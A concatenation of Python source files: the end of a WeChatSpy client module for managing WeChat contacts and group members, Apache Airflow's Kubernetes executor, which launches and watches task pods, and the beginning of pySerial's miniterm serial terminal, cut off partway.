:param pid:
:return:
"""
data = {"code": 10, "wxid": wxid, "chatroom_wxid": chatroom_wxid}
self.__send(data, pid)
def remove_chatroom_member(self, chatroom_wxid, wxid, pid=None):
"""
移除群成员
:param chatroom_wxid:
:param wxid:
:param pid:
:return:
"""
data = {"code": 11, "wxid": wxid, "chatroom_wxid": chatroom_wxid}
self.__send(data, pid)
def remove_contact(self, wxid, pid=None):
"""
移除联系人
:param wxid:
:param pid:
:return:
"""
data = {"code": 12, "wxid": wxid}
self.__send(data, pid)
def add_contact_from_chatroom(self, chatroom_wxid, wxid, msg, pid=None):
"""
将群成员添加为好友
:param chatroom_wxid: 群wxid
:param wxid: 群成员wxid
:param msg: 好友申请信息
:param pid:
:return:
"""
data = {"code": 13, "wxid": wxid, "chatroom_wxid": chatroom_wxid, "msg": msg}
self.__send(data, pid)
def add_unidirectional_contact_a(self, wxid, msg, pid=None):
"""
添加单向好友(自己被对方删除)
:param wxid:
:param msg: 好友申请信息
:param pid:
:return:
"""
data = {"code": 14, "wxid": wxid, "msg": msg}
self.__send(data, pid)
def add_unidirectional_contact_b(self, wxid, pid=None):
"""
添加单向好友(对方被自己删除)
:param wxid:
:param pid:
:return:
"""
data = {"code": 15, "wxid": wxid}
self.__send(data, pid)
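# Editor's illustration (a minimal sketch, not part of the original module): wiring
# WeChatSpy to a message-parsing callback; intended to be called from the package user's
# own entry point. The callback below simply prints every parsed message dict.
def example_run_spy():
    def _print_message(data):
        print(data)

    spy = WeChatSpy(parser=_print_message)
    spy.run()  # blocks; pass background=True to return immediately after launching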
|
kubernetes_executor.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
KubernetesExecutor
.. seealso::
For more information on how the KubernetesExecutor works, take a look at the guide:
:ref:`executor:KubernetesExecutor`
"""
import base64
import functools
import json
import multiprocessing
import time
from queue import Empty, Queue # pylint: disable=unused-import
from typing import Any, Dict, Optional, Tuple, Union
import kubernetes
from dateutil import parser
from kubernetes import client, watch
from kubernetes.client import Configuration
from kubernetes.client.rest import ApiException
from urllib3.exceptions import ReadTimeoutError
from airflow import settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.executors.base_executor import NOT_STARTED_MESSAGE, BaseExecutor, CommandType
from airflow.kubernetes import pod_generator
from airflow.kubernetes.kube_client import get_kube_client
from airflow.kubernetes.pod_generator import MAX_POD_ID_LEN, PodGenerator
from airflow.kubernetes.pod_launcher import PodLauncher
from airflow.models import KubeResourceVersion, KubeWorkerIdentifier, TaskInstance
from airflow.models.taskinstance import TaskInstanceKey
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import provide_session
from airflow.utils.state import State
# TaskInstance key, command, configuration
KubernetesJobType = Tuple[TaskInstanceKey, CommandType, Any]
# key, state, pod_id, namespace, resource_version
KubernetesResultsType = Tuple[TaskInstanceKey, Optional[str], str, str, str]
# pod_id, namespace, state, annotations, resource_version
KubernetesWatchType = Tuple[str, str, Optional[str], Dict[str, str], str]
class KubeConfig: # pylint: disable=too-many-instance-attributes
"""Configuration for Kubernetes"""
core_section = 'core'
kubernetes_section = 'kubernetes'
logging_section = 'logging'
def __init__(self): # pylint: disable=too-many-statements
configuration_dict = conf.as_dict(display_sensitive=True)
self.core_configuration = configuration_dict['core']
self.airflow_home = settings.AIRFLOW_HOME
self.dags_folder = conf.get(self.core_section, 'dags_folder')
self.parallelism = conf.getint(self.core_section, 'parallelism')
self.pod_template_file = conf.get(self.kubernetes_section, 'pod_template_file',
fallback=None)
self.delete_worker_pods = conf.getboolean(
self.kubernetes_section, 'delete_worker_pods')
self.delete_worker_pods_on_failure = conf.getboolean(
self.kubernetes_section, 'delete_worker_pods_on_failure')
self.worker_pods_creation_batch_size = conf.getint(
self.kubernetes_section, 'worker_pods_creation_batch_size')
self.worker_container_repository = conf.get(
self.kubernetes_section, 'worker_container_repository')
self.worker_container_tag = conf.get(
self.kubernetes_section, 'worker_container_tag')
self.kube_image = f'{self.worker_container_repository}:{self.worker_container_tag}'
# The Kubernetes Namespace in which the Scheduler and Webserver reside. Note
# that if your
# cluster has RBAC enabled, your scheduler may need service account permissions to
# create, watch, get, and delete pods in this namespace.
self.kube_namespace = conf.get(self.kubernetes_section, 'namespace')
self.multi_namespace_mode = conf.getboolean(self.kubernetes_section, 'multi_namespace_mode')
# The Kubernetes Namespace in which pods will be created by the executor. Note
# that if your
# cluster has RBAC enabled, your workers may need service account permissions to
# interact with cluster components.
self.executor_namespace = conf.get(self.kubernetes_section, 'namespace')
kube_client_request_args = conf.get(self.kubernetes_section, 'kube_client_request_args')
if kube_client_request_args:
self.kube_client_request_args = json.loads(kube_client_request_args)
if self.kube_client_request_args['_request_timeout'] and \
isinstance(self.kube_client_request_args['_request_timeout'], list):
self.kube_client_request_args['_request_timeout'] = \
tuple(self.kube_client_request_args['_request_timeout'])
else:
self.kube_client_request_args = {}
delete_option_kwargs = conf.get(self.kubernetes_section, 'delete_option_kwargs')
if delete_option_kwargs:
self.delete_option_kwargs = json.loads(delete_option_kwargs)
else:
self.delete_option_kwargs = {}
# pod security context items should return integers
# and only return a blank string if contexts are not set.
def _get_security_context_val(self, scontext: str) -> Union[str, int]:
val = conf.get(self.kubernetes_section, scontext)
if not val:
return ""
else:
return int(val)
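# Editor's illustration (a minimal sketch, not part of the executor): the normalization
# KubeConfig.__init__ applies to a JSON "kube_client_request_args" value, where a
# list-valued "_request_timeout" is converted to the (connect, read) tuple form the
# Kubernetes client accepts.
def _example_normalize_request_timeout(request_args: Dict[str, Any]) -> Dict[str, Any]:
    timeout = request_args.get('_request_timeout')
    if isinstance(timeout, list):
        request_args['_request_timeout'] = tuple(timeout)
    return request_args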
class KubernetesJobWatcher(LoggingMixin):
"""Watches for Kubernetes jobs"""
def __init__(self,
namespace: Optional[str],
multi_namespace_mode: bool,
watcher_queue: 'Queue[KubernetesWatchType]',
resource_version: Optional[str],
worker_uuid: Optional[str],
kube_config: Configuration):
super().__init__()
self.namespace = namespace
self.multi_namespace_mode = multi_namespace_mode
self.worker_uuid = worker_uuid
self.watcher_queue = watcher_queue
self.resource_version = resource_version
self.kube_config = kube_config
self.watcher_process = multiprocessing.Process(target=self.run, args=())
def start(self):
"""
Start the watcher process
"""
self.watcher_process.start()
def is_alive(self):
"""
Check if the watcher process is alive
"""
        return self.watcher_process.is_alive()
def join(self):
"""
Join watcher process
"""
self.watcher_process.join()
def terminate(self):
"""
Terminate watcher process
"""
self.watcher_process.terminate()
def run(self) -> None:
"""Performs watching"""
kube_client: client.CoreV1Api = get_kube_client()
if not self.worker_uuid:
raise AirflowException(NOT_STARTED_MESSAGE)
while True:
try:
self.resource_version = self._run(kube_client, self.resource_version,
self.worker_uuid, self.kube_config)
except ReadTimeoutError:
self.log.warning("There was a timeout error accessing the Kube API. "
"Retrying request.", exc_info=True)
time.sleep(1)
except Exception:
self.log.exception('Unknown error in KubernetesJobWatcher. Failing')
raise
else:
self.log.warning('Watch died gracefully, starting back up with: '
'last resource_version: %s', self.resource_version)
def _run(self,
kube_client: client.CoreV1Api,
resource_version: Optional[str],
worker_uuid: str,
kube_config: Any) -> Optional[str]:
self.log.info(
'Event: and now my watch begins starting at resource_version: %s',
resource_version
)
watcher = watch.Watch()
kwargs = {'label_selector': 'airflow-worker={}'.format(worker_uuid)}
if resource_version:
kwargs['resource_version'] = resource_version
if kube_config.kube_client_request_args:
for key, value in kube_config.kube_client_request_args.items():
kwargs[key] = value
last_resource_version: Optional[str] = None
if self.multi_namespace_mode:
list_worker_pods = functools.partial(watcher.stream,
kube_client.list_pod_for_all_namespaces,
**kwargs)
else:
list_worker_pods = functools.partial(watcher.stream,
kube_client.list_namespaced_pod,
self.namespace,
**kwargs)
for event in list_worker_pods():
task = event['object']
self.log.info(
'Event: %s had an event of type %s',
task.metadata.name, event['type']
)
if event['type'] == 'ERROR':
return self.process_error(event)
annotations = task.metadata.annotations
task_instance_related_annotations = {
'dag_id': annotations['dag_id'],
'task_id': annotations['task_id'],
'execution_date': annotations['execution_date'],
'try_number': annotations['try_number'],
}
self.process_status(
pod_id=task.metadata.name,
namespace=task.metadata.namespace,
status=task.status.phase,
annotations=task_instance_related_annotations,
resource_version=task.metadata.resource_version,
event=event,
)
last_resource_version = task.metadata.resource_version
return last_resource_version
def process_error(self, event: Any) -> str:
"""Process error response"""
self.log.error(
'Encountered Error response from k8s list namespaced pod stream => %s',
event
)
raw_object = event['raw_object']
if raw_object['code'] == 410:
self.log.info(
'Kubernetes resource version is too old, must reset to 0 => %s',
(raw_object['message'],)
)
# Return resource version 0
return '0'
raise AirflowException(
'Kubernetes failure for %s with code %s and message: %s' %
(raw_object['reason'], raw_object['code'], raw_object['message'])
)
def process_status(self, pod_id: str,
namespace: str,
status: str,
annotations: Dict[str, str],
resource_version: str,
event: Any) -> None:
"""Process status response"""
if status == 'Pending':
if event['type'] == 'DELETED':
self.log.info('Event: Failed to start pod %s, will reschedule', pod_id)
self.watcher_queue.put(
(pod_id, namespace, State.UP_FOR_RESCHEDULE, annotations, resource_version)
)
else:
self.log.info('Event: %s Pending', pod_id)
elif status == 'Failed':
self.log.error('Event: %s Failed', pod_id)
self.watcher_queue.put((pod_id, namespace, State.FAILED, annotations, resource_version))
elif status == 'Succeeded':
self.log.info('Event: %s Succeeded', pod_id)
self.watcher_queue.put((pod_id, namespace, None, annotations, resource_version))
elif status == 'Running':
self.log.info('Event: %s is Running', pod_id)
else:
self.log.warning(
'Event: Invalid state: %s on pod: %s in namespace %s with annotations: %s with '
'resource_version: %s', status, pod_id, namespace, annotations, resource_version
)
class AirflowKubernetesScheduler(LoggingMixin):
"""Airflow Scheduler for Kubernetes"""
def __init__(self,
kube_config: Any,
task_queue: 'Queue[KubernetesJobType]',
result_queue: 'Queue[KubernetesResultsType]',
kube_client: client.CoreV1Api,
worker_uuid: str):
super().__init__()
self.log.debug("Creating Kubernetes executor")
self.kube_config = kube_config
self.task_queue = task_queue
self.result_queue = result_queue
self.namespace = self.kube_config.kube_namespace
self.log.debug("Kubernetes using namespace %s", self.namespace)
self.kube_client = kube_client
self.launcher = PodLauncher(kube_client=self.kube_client)
self._manager = multiprocessing.Manager()
self.watcher_queue = self._manager.Queue()
self.worker_uuid = worker_uuid
self.kube_watcher = self._make_kube_watcher()
def _make_kube_watcher(self) -> KubernetesJobWatcher:
resource_version = KubeResourceVersion.get_current_resource_version()
watcher = KubernetesJobWatcher(watcher_queue=self.watcher_queue,
namespace=self.kube_config.kube_namespace,
multi_namespace_mode=self.kube_config.multi_namespace_mode,
resource_version=resource_version,
worker_uuid=self.worker_uuid,
kube_config=self.kube_config)
watcher.start()
return watcher
def _health_check_kube_watcher(self):
if self.kube_watcher.is_alive():
pass
else:
self.log.error(
'Error while health checking kube watcher process. '
'Process died for unknown reasons')
self.kube_watcher = self._make_kube_watcher()
def run_next(self, next_job: KubernetesJobType) -> None:
"""
The run_next command will check the task_queue for any un-run jobs.
It will then create a unique job-id, launch that job in the cluster,
and store relevant info in the current_jobs map so we can track the job's
status
"""
self.log.info('Kubernetes job is %s', str(next_job))
key, command, kube_executor_config = next_job
dag_id, task_id, execution_date, try_number = key
if command[0:3] != ["airflow", "tasks", "run"]:
raise ValueError('The command must start with ["airflow", "tasks", "run"].')
base_worker_pod = PodGenerator.deserialize_model_file(self.kube_config.pod_template_file)
if not base_worker_pod:
raise AirflowException("could not find a valid worker template yaml at {}"
.format(self.kube_config.pod_template_file))
pod = PodGenerator.construct_pod(
namespace=self.namespace,
worker_uuid=self.worker_uuid,
pod_id=self._create_pod_id(dag_id, task_id),
dag_id=dag_id,
task_id=task_id,
kube_image=self.kube_config.kube_image,
try_number=try_number,
date=execution_date,
command=command,
pod_override_object=kube_executor_config,
base_worker_pod=base_worker_pod
)
# Reconcile the pod generated by the Operator and the Pod
# generated by the .cfg file
self.log.debug("Kubernetes running for command %s", command)
self.log.debug("Kubernetes launching image %s", pod.spec.containers[0].image)
# the watcher will monitor pods, so we do not block.
self.launcher.run_pod_async(pod, **self.kube_config.kube_client_request_args)
self.log.debug("Kubernetes Job created!")
def delete_pod(self, pod_id: str, namespace: str) -> None:
"""Deletes POD"""
try:
self.kube_client.delete_namespaced_pod(
pod_id, namespace, body=client.V1DeleteOptions(**self.kube_config.delete_option_kwargs),
**self.kube_config.kube_client_request_args)
except ApiException as e:
# If the pod is already deleted
if e.status != 404:
raise
def sync(self) -> None:
"""
The sync function checks the status of all currently running kubernetes jobs.
If a job is completed, its status is placed in the result queue to
be sent back to the scheduler.
:return:
"""
self._health_check_kube_watcher()
while True:
try:
task = self.watcher_queue.get_nowait()
try:
self.process_watcher_task(task)
finally:
self.watcher_queue.task_done()
except Empty:
break
def process_watcher_task(self, task: KubernetesWatchType) -> None:
"""Process the task by watcher."""
pod_id, namespace, state, annotations, resource_version = task
self.log.info(
'Attempting to finish pod; pod_id: %s; state: %s; annotations: %s',
pod_id, state, annotations
)
key = self._annotations_to_key(annotations=annotations)
if key:
self.log.debug('finishing job %s - %s (%s)', key, state, pod_id)
self.result_queue.put((key, state, pod_id, namespace, resource_version))
def _annotations_to_key(self, annotations: Dict[str, str]) -> Optional[TaskInstanceKey]:
dag_id = annotations['dag_id']
task_id = annotations['task_id']
try_number = int(annotations['try_number'])
execution_date = parser.parse(annotations['execution_date'])
return TaskInstanceKey(dag_id, task_id, execution_date, try_number)
@staticmethod
def _strip_unsafe_kubernetes_special_chars(string: str) -> str:
"""
Kubernetes only supports lowercase alphanumeric characters and "-" and "." in
the pod name
However, there are special rules about how "-" and "." can be used so let's
only keep
alphanumeric chars see here for detail:
https://kubernetes.io/docs/concepts/overview/working-with-objects/names/
:param string: The requested Pod name
:return: ``str`` Pod name stripped of any unsafe characters
"""
        return ''.join(ch.lower() for ch in string if ch.isalnum())
@staticmethod
def _make_safe_pod_id(safe_dag_id: str, safe_task_id: str, safe_uuid: str) -> str:
r"""
Kubernetes pod names must be <= 253 chars and must pass the following regex for
validation
``^[a-z0-9]([-a-z0-9]*[a-z0-9])?(\\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*$``
:param safe_dag_id: a dag_id with only alphanumeric characters
:param safe_task_id: a task_id with only alphanumeric characters
:param safe_uuid: a uuid
:return: ``str`` valid Pod name of appropriate length
"""
safe_key = safe_dag_id + safe_task_id
safe_pod_id = safe_key[:MAX_POD_ID_LEN - len(safe_uuid) - 1] + "-" + safe_uuid
return safe_pod_id
@staticmethod
def _create_pod_id(dag_id: str, task_id: str) -> str:
safe_dag_id = AirflowKubernetesScheduler._strip_unsafe_kubernetes_special_chars(
dag_id)
safe_task_id = AirflowKubernetesScheduler._strip_unsafe_kubernetes_special_chars(
task_id)
return safe_dag_id + safe_task_id
def _flush_watcher_queue(self) -> None:
self.log.debug('Executor shutting down, watcher_queue approx. size=%d', self.watcher_queue.qsize())
while True:
try:
task = self.watcher_queue.get_nowait()
# Ignoring it since it can only have either FAILED or SUCCEEDED pods
self.log.warning('Executor shutting down, IGNORING watcher task=%s', task)
self.watcher_queue.task_done()
except Empty:
break
def terminate(self) -> None:
"""Terminates the watcher."""
self.log.debug("Terminating kube_watcher...")
self.kube_watcher.terminate()
self.kube_watcher.join()
self.log.debug("kube_watcher=%s", self.kube_watcher)
self.log.debug("Flushing watcher_queue...")
self._flush_watcher_queue()
# Queue should be empty...
self.watcher_queue.join()
self.log.debug("Shutting down manager...")
self._manager.shutdown()
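# --- Editor's illustrative sketch (not part of the original executor module) ---
# The sync() docstring above describes the pattern used throughout this file:
# drain a queue without blocking, process each item, and always mark it done.
# Below is a minimal, self-contained restatement of that drain loop, reusing the
# module's ``Empty`` import; the names (_drain_queue_example, handle) are
# hypothetical and the function is defined purely for illustration, never called.
def _drain_queue_example(q: 'Queue', handle) -> None:
    """Drain ``q`` without blocking, calling ``handle`` on each item."""
    while True:
        try:
            item = q.get_nowait()
            try:
                handle(item)
            finally:
                q.task_done()
        except Empty:
            break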
class KubernetesExecutor(BaseExecutor, LoggingMixin):
"""Executor for Kubernetes"""
def __init__(self):
self.kube_config = KubeConfig()
self._manager = multiprocessing.Manager()
self.task_queue: 'Queue[KubernetesJobType]' = self._manager.Queue()
self.result_queue: 'Queue[KubernetesResultsType]' = self._manager.Queue()
self.kube_scheduler: Optional[AirflowKubernetesScheduler] = None
self.kube_client: Optional[client.CoreV1Api] = None
self.worker_uuid: Optional[str] = None
super().__init__(parallelism=self.kube_config.parallelism)
@provide_session
def clear_not_launched_queued_tasks(self, session=None) -> None:
"""
If the airflow scheduler restarts with pending "Queued" tasks, the tasks may or
may not
have been launched. Thus on starting up the scheduler let's check every
"Queued" task to
see if it has been launched (ie: if there is a corresponding pod on kubernetes)
If it has been launched then do nothing, otherwise reset the state to "None" so
the task
will be rescheduled
This will not be necessary in a future version of airflow in which there is
proper support
for State.LAUNCHED
"""
if not self.kube_client:
raise AirflowException(NOT_STARTED_MESSAGE)
queued_tasks = session \
.query(TaskInstance) \
.filter(TaskInstance.state == State.QUEUED).all()
self.log.info(
'When executor started up, found %s queued task instances',
len(queued_tasks)
)
for task in queued_tasks:
# pylint: disable=protected-access
dict_string = (
"dag_id={},task_id={},execution_date={},airflow-worker={}".format(
pod_generator.make_safe_label_value(task.dag_id),
pod_generator.make_safe_label_value(task.task_id),
pod_generator.datetime_to_label_safe_datestring(
task.execution_date
),
self.worker_uuid
)
)
# pylint: enable=protected-access
kwargs = dict(label_selector=dict_string)
if self.kube_config.kube_client_request_args:
for key, value in self.kube_config.kube_client_request_args.items():
kwargs[key] = value
pod_list = self.kube_client.list_namespaced_pod(
self.kube_config.kube_namespace, **kwargs)
if not pod_list.items:
self.log.info(
'TaskInstance: %s found in queued state but was not launched, '
'rescheduling', task
)
session.query(TaskInstance).filter(
TaskInstance.dag_id == task.dag_id,
TaskInstance.task_id == task.task_id,
TaskInstance.execution_date == task.execution_date
).update({TaskInstance.state: State.NONE})
def _inject_secrets(self) -> None:
def _create_or_update_secret(secret_name, secret_path):
try:
return self.kube_client.create_namespaced_secret(
self.kube_config.executor_namespace, kubernetes.client.V1Secret(
data={
                            'key.json': base64.b64encode(open(secret_path, 'rb').read())},
metadata=kubernetes.client.V1ObjectMeta(name=secret_name)),
**self.kube_config.kube_client_request_args)
except ApiException as e:
if e.status == 409:
return self.kube_client.replace_namespaced_secret(
secret_name, self.kube_config.executor_namespace,
kubernetes.client.V1Secret(
data={'key.json': base64.b64encode(
                                open(secret_path, 'rb').read())},
metadata=kubernetes.client.V1ObjectMeta(name=secret_name)),
**self.kube_config.kube_client_request_args)
self.log.exception(
'Exception while trying to inject secret. '
'Secret name: %s, error details: %s',
secret_name, e
)
raise
def start(self) -> None:
"""Starts the executor"""
self.log.info('Start Kubernetes executor')
self.worker_uuid = KubeWorkerIdentifier.get_or_create_current_kube_worker_uuid()
if not self.worker_uuid:
raise AirflowException("Could not get worker uuid")
self.log.debug('Start with worker_uuid: %s', self.worker_uuid)
        # always need to reset resource version since we don't know
        # when we last started, note for behavior below
        # https://github.com/kubernetes-client/python/blob/master/kubernetes/docs/CoreV1Api.md#list_namespaced_pod
KubeResourceVersion.reset_resource_version()
self.kube_client = get_kube_client()
self.kube_scheduler = AirflowKubernetesScheduler(
self.kube_config, self.task_queue, self.result_queue,
self.kube_client, self.worker_uuid
)
self._inject_secrets()
self.clear_not_launched_queued_tasks()
def execute_async(self,
key: TaskInstanceKey,
command: CommandType,
queue: Optional[str] = None,
executor_config: Optional[Any] = None) -> None:
"""Executes task asynchronously"""
self.log.info(
'Add task %s with command %s with executor_config %s',
key, command, executor_config
)
kube_executor_config = PodGenerator.from_obj(executor_config)
if not self.task_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
self.task_queue.put((key, command, kube_executor_config))
def sync(self) -> None:
"""Synchronize task state."""
if self.running:
self.log.debug('self.running: %s', self.running)
if self.queued_tasks:
self.log.debug('self.queued: %s', self.queued_tasks)
if not self.worker_uuid:
raise AirflowException(NOT_STARTED_MESSAGE)
if not self.kube_scheduler:
raise AirflowException(NOT_STARTED_MESSAGE)
if not self.kube_config:
raise AirflowException(NOT_STARTED_MESSAGE)
if not self.result_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
if not self.task_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
self.kube_scheduler.sync()
last_resource_version = None
while True: # pylint: disable=too-many-nested-blocks
try:
results = self.result_queue.get_nowait()
try:
key, state, pod_id, namespace, resource_version = results
last_resource_version = resource_version
self.log.info('Changing state of %s to %s', results, state)
try:
self._change_state(key, state, pod_id, namespace)
except Exception as e: # pylint: disable=broad-except
self.log.exception(
"Exception: %s when attempting to change state of %s to %s, re-queueing.",
e, results, state
)
self.result_queue.put(results)
finally:
self.result_queue.task_done()
except Empty:
break
KubeResourceVersion.checkpoint_resource_version(last_resource_version)
# pylint: disable=too-many-nested-blocks
for _ in range(self.kube_config.worker_pods_creation_batch_size):
try:
task = self.task_queue.get_nowait()
try:
self.kube_scheduler.run_next(task)
except ApiException as e:
if e.reason == "BadRequest":
self.log.error("Request was invalid. Failing task")
key, _, _ = task
self.change_state(key, State.FAILED, e)
else:
self.log.warning('ApiException when attempting to run task, re-queueing. '
'Message: %s', json.loads(e.body)['message'])
self.task_queue.put(task)
finally:
self.task_queue.task_done()
except Empty:
break
# pylint: enable=too-many-nested-blocks
def _change_state(self,
key: TaskInstanceKey,
state: Optional[str],
pod_id: str,
namespace: str) -> None:
if state != State.RUNNING:
if self.kube_config.delete_worker_pods:
if not self.kube_scheduler:
raise AirflowException(NOT_STARTED_MESSAGE)
if state is not State.FAILED or self.kube_config.delete_worker_pods_on_failure:
self.kube_scheduler.delete_pod(pod_id, namespace)
self.log.info('Deleted pod: %s in namespace %s', str(key), str(namespace))
try:
self.running.remove(key)
except KeyError:
self.log.debug('Could not find key: %s', str(key))
self.event_buffer[key] = state, None
def _flush_task_queue(self) -> None:
if not self.task_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
self.log.debug('Executor shutting down, task_queue approximate size=%d', self.task_queue.qsize())
while True:
try:
task = self.task_queue.get_nowait()
# This is a new task to run thus ok to ignore.
self.log.warning('Executor shutting down, will NOT run task=%s', task)
self.task_queue.task_done()
except Empty:
break
def _flush_result_queue(self) -> None:
if not self.result_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
self.log.debug('Executor shutting down, result_queue approximate size=%d', self.result_queue.qsize())
while True: # pylint: disable=too-many-nested-blocks
try:
results = self.result_queue.get_nowait()
self.log.warning('Executor shutting down, flushing results=%s', results)
try:
key, state, pod_id, namespace, resource_version = results
                    self.log.info('Changing state of %s to %s : resource_version=%s', results, state,
                                  resource_version)
try:
self._change_state(key, state, pod_id, namespace)
except Exception as e: # pylint: disable=broad-except
self.log.exception('Ignoring exception: %s when attempting to change state of %s '
'to %s.', e, results, state)
finally:
self.result_queue.task_done()
except Empty:
break
def end(self) -> None:
"""Called when the executor shuts down"""
if not self.task_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
if not self.result_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
if not self.kube_scheduler:
raise AirflowException(NOT_STARTED_MESSAGE)
self.log.info('Shutting down Kubernetes executor')
self.log.debug('Flushing task_queue...')
self._flush_task_queue()
self.log.debug('Flushing result_queue...')
self._flush_result_queue()
# Both queues should be empty...
self.task_queue.join()
self.result_queue.join()
if self.kube_scheduler:
self.kube_scheduler.terminate()
self._manager.shutdown()
def terminate(self):
"""Terminate the executor is not doing anything."""
|
miniterm.py
|
#!C:\Users\melih\PycharmProjects\ebook_study\venv\Scripts\python.exe
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
    raw_input = input  # in python3, input() already behaves like raw_input
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
            elif z in (unichr(0), unichr(0x0e)):    # function keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
